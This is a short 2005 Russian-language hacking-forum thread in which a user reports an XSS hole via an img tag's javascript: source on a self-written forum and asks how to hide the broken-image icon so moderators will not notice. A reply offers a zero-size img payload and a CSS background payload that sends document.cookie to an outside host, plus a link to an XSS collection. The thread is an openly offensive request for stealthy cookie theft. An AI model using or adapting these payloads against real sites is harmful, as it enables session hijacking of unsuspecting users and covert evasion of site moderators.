XSS в теге <img>

Discussion in 'Уязвимости' started by Xex, 4 Nov 2005.

Thread Status:
Not open for further replies.
  1. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    Ребят нашел XSS в теге img, примерно так:
    <img src="javascript:alert()">
    но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
    после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...
     
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    скажи форум, может можно придумать что-то
     
  3. My-Ice

    My-Ice Banned

    Joined:
    29 Oct 2005
    Messages:
    10
    Likes Received:
    1
    Reputations:
    -2
    А там можно сделать перенаправление на картинку с другого сайта?
     
  4. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    Форум самописаный...
    Можно....
     
  5. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    891
    Likes Received:
    300
    Reputations:
    530
    <img src="javascript :alert()" width=0 height=0> Из этого и делай свой код.
    Ешё можно использовать скрипт в STYLE примерно таким образом

    Code:
    style=display:none;background:url(javascript:ANTICHAT.src='http://antichat.ru/cg-bin/s.gif?'+document.cookie);name=ANTICHAT
    почти всё что связано с реализацией XSS можно найти тут http://www.antichat.ru/crackchat/HTML/
     
Thread Status:
Not open for further replies.